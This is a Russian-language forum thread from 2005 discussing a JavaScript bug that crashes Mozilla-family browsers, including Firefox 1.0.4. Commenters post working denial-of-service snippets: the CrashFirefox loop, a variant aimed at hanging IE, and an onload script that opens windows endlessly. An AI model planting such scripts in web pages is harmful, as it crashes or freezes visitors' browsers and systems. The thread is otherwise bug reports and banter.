LINUX.ORG.RU

Уязвимость во многих браузерах семейства Mozilla


0

0

Paul Kurczaba сообщает об уязвимости в семействе Mozilla-ориентированных браузеров. Сформировав специальную JavaScript-функцию, атакующий может вызвать отказ браузера. Автором выпущены 2 варианта подобной атаки - один предполагает участие пользователя, второй не требует участия. Уязвимости подвержены: Mozilla 1.7.8, Firefox 1.0.4, Camino 0.8.4. В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.

>>> Подробности



Проверено: Shaman007 ()

ff 1.0.4 winxp - работает
дома на mozill`е проверю

diavolo
()

Источник - uinc.ru

pinkler
() автор топика

Работает-работает и на ff4 под линукс и под windows-( Ждем багфигка, берем из nightly -)

Ism
()
Ответ на: комментарий от anonymous

>Это уже диагноз новая дырка каждую неделю :)

Ну не совсем дырка, темболее совсем неопасная

Orlangoor ★★★★★
()

> В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.

Еще бы убедить идиотов-вебламеров, чтобы делали сайты по нормальному:
то есть так, чтобы джопаскрипт не был единственным вариантом навигации...

anonymous
()
Ответ на: комментарий от anonymous

В качестве меры противодействия рекомендуется выкинуть Mozilla soft и выпить йаду)

anonymous
()
Ответ на: комментарий от anonymous

А вот как это осуществляется

Вот функция, которая вешает Мозиллу:

function CrashFirefox()
{
    //Run the function 20000 times
    for (a = 0; a <= 20000; a++)
    {
        //Here is the special code that terminates the browser
        function(){};
    }
	
    //Displays an alert to notify the user if the browser is not vulnerable.
    alert("Good news - Your browser is not vulnerable.");
}

Короче, просто в цикле порождается много пустых функций. И Мозилла падает. Что характерно - IE нормально (и очень быстро) отрабатывает. Похоже, там защита стоит от этого.

Есть теория, что бесконечное число мартышек с компьютерами когда-нибудь смогут написать "Войну и мир". Она до сих пор не доказана. Зато точно известно, что под силу бесконечному числу мартышек - находить новые уязвимости в браузерах.

anonymous
()

Работает, хотя у меня из функций жабаскрипт включено только изменение изображений - в первом случае окно закрывается, во втором - зависает.

mikhail
()
Ответ на: комментарий от anonymous

>В качестве меры противодействия рекомендуется выклуючить ПК.
возможное падение браузера настолько критичнo?

Anonymous ★★★★★
()
Ответ на: комментарий от anonymous

> Так для этого есть Preference tool bar - одним кликом отключаешь и включаешь JS :)

ага, сразу после падения браузера...

anonymous
()
Ответ на: А вот как это осуществляется от anonymous

глупый баг какой-то :)

>Есть теория

закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

Pi ★★★★★
()

firefox 1.0.4 c mozilla.org падает firefox 1.0.2 из убунту уже нет

JB ★★★★★
()

Слава ВЕЛИКОМУ МАНИТУ , Шо Я использую непревзойденный бровзер ИЕ! а то б валялся б щас где-нибудь на дне Ниагарского водопада!

anonymous
()

Это хорошо, что код чистят понемногу. Слава мартышкам!

anonymous
()

а knoqueror-у хоть бы хны :)

// wbr

klalafuda ★☆☆
()

Достала джава эта дырявая. Из-за неё больше половины всех дыр. Обычная ссылка уже не катит? Че все пихают куда надо и куда не надо эту пакость?

manokur ★★
()
Ответ на: комментарий от anonymous

Бред это всё собачий!!!

Народ кто нить положите где-нить на сайте у себя

ту же страничку, только

функцию CrashFirefox замените на приведённую ниже....

и запостите новость типа, IE зависает намертво ещё и грузя ресурсы машины офигенно.... Хотя тот же самый Firefox предлагает прервать слишком долгий скрипт....

function CrashFirefox() { var test = 0; //Run the function 20000 times for (a = 0; a <= 1000000; a++) { //Here is the special code that terminates the browser test = test + function( test ){ return test++;}; } document.write(test); //Displays an alert to notify the user if the browser is not vul alert("Good news - Your browser is not vulnerable."); }

romaxa
()

Ну почему уязвимость то? Дебилизм уже просто.. Это же обычный BUG. Писец.. все помешаны на "уязвимостях".. В чём тут уязвимость то? И уязвимость чего? брр... бесит

ydanneg
()
Ответ на: комментарий от anonymous

>А еще если мышкой помахать на FF проц грузит чрезмерно.

потому что это магия высшего порядка, недоступная виндовозному ламерью

anonymous
()
Ответ на: комментарий от manokur

> Достала джава эта дырявая.

Достали дятлы, неспособные отличить java от javascript

anonymous
()
Ответ на: комментарий от Pi

> закон больших чисел. Если постоянно и бесконечно искать и находить баги /c постоянной вероятностью их нахождения/, то их нахождение станет не случайным, а закономерным :(

Сколько развелось разных трактований ЗВЧ. Он же говорит при каких условиях на последовательность случайных чисел En, (1/n)Sum|En-MEn| сходится к 0 за вероятностью.

anonymous
()
Ответ на: комментарий от anonymous

> Хороший повод с дрявой мозиллы перейти на Оперу

Я уже для IE написал чрень которая будет вешать IE как нефик делать...

Написать тоже самой для Oper-ы?

romaxa
()
Ответ на: комментарий от anonymous

> Хороший повод с дрявой мозиллы перейти на Оперу

Ты у нас всегда навстречу основному потоку движешься? Сейчас вообще-то люди в основном с оперы на ff переползают.

anonymous
()

Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 -- работает :,(

Windophob
()
Ответ на: комментарий от anonymous

и отловить корок. мсье понимает толк в извращениях

anonymous
()

мда. вот вам тогда еще одна "уязвимость" - нашел еще года два назад. Мозилла просто падает, ИЕ пораждает множество окон и если вовремя не прибить, то уносит за собой ОС, на других браузерах не пробовал, если кто попробует, то напишите о поведении... <body onload="javascript:for(;;)open('http://ie.sux/')">

KAdot
()
Ответ на: комментарий от anonymous

в неё надо поставить неуд :)

ибо к нулю! т.к. ЗБЧ говорит о сходимости среднего арифметического величин к среднему арифметическому матожиданий

deil
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.